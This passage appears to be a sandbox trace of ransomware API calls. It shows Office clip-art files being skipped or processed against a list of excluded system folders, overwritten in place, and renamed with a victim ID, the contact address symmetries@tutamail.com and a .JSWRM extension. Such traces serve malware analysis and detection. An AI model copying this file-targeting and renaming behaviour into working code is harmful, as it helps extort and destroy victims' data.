hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xea2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN01184_.WMF", cAlternateFileName="")) returned 1 [0074.076] lstrcmpiW (lpString1="AN01184_.WMF", lpString2=".") returned 1 [0074.076] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="..") returned 1 [0074.076] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="...") returned 1 [0074.076] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="windows") returned -1 [0074.076] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="recovery") returned -1 [0074.076] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="perflogs") returned -1 [0074.076] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="documents and settings") returned -1 [0074.076] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.077] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="system volume information") returned -1 [0074.077] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="msocache") returned -1 [0074.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0074.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01184_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01184_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01184_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0074.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0074.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01184_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01184_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01184_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0074.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.077] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3746) returned 1 [0074.077] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xea0) returned 0x24c1d0 [0074.077] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xea0, lpOverlapped=0x0) returned 1 [0074.081] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.081] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xea0, lpOverlapped=0x0) returned 1 [0074.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.081] CloseHandle (hObject=0x460) returned 1 [0074.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0074.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0074.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0074.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0074.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0074.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.081] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0074.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.082] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16cc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN01216_.WMF", cAlternateFileName="")) returned 1 [0074.082] lstrcmpiW (lpString1="AN01216_.WMF", lpString2=".") returned 1 [0074.082] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="..") returned 1 [0074.082] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="...") returned 1 [0074.082] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="windows") returned -1 [0074.082] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="recovery") returned -1 [0074.082] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="perflogs") returned -1 [0074.082] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="documents and settings") returned -1 [0074.082] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.082] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="system volume information") returned -1 [0074.082] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="msocache") returned -1 [0074.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01216_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01216_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01216_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0074.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01216_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01216_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01216_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0074.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.083] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5836) returned 1 [0074.083] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16c0) returned 0x24c1d0 [0074.083] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x16c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x16c0, lpOverlapped=0x0) returned 1 [0074.085] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.085] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x16c0, lpOverlapped=0x0) returned 1 [0074.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.085] CloseHandle (hObject=0x460) returned 1 [0074.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0074.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0074.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0074.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0074.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0074.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.085] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0074.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.086] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN01218_.WMF", cAlternateFileName="")) returned 1 [0074.086] lstrcmpiW (lpString1="AN01218_.WMF", lpString2=".") returned 1 [0074.086] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="..") returned 1 [0074.086] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="...") returned 1 [0074.086] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="windows") returned -1 [0074.086] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="recovery") returned -1 [0074.086] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="perflogs") returned -1 [0074.086] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="documents and settings") returned -1 [0074.086] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.086] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="system volume information") returned -1 [0074.086] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="msocache") returned -1 [0074.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0074.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01218_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01218_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01218_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0074.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0074.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01218_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01218_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01218_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0074.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.087] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3012) returned 1 [0074.087] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbc0) returned 0x24c1d0 [0074.087] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xbc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xbc0, lpOverlapped=0x0) returned 1 [0074.089] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.089] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xbc0, lpOverlapped=0x0) returned 1 [0074.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.089] CloseHandle (hObject=0x460) returned 1 [0074.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0074.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0074.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0074.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0074.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0074.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.089] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0074.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.090] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xac4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN01251_.WMF", cAlternateFileName="")) returned 1 [0074.090] lstrcmpiW (lpString1="AN01251_.WMF", lpString2=".") returned 1 [0074.090] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="..") returned 1 [0074.090] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="...") returned 1 [0074.090] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="windows") returned -1 [0074.090] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="recovery") returned -1 [0074.090] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="perflogs") returned -1 [0074.090] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="documents and settings") returned -1 [0074.090] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.090] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="system volume information") returned -1 [0074.090] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="msocache") returned -1 [0074.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0074.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01251_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01251_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01251_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: 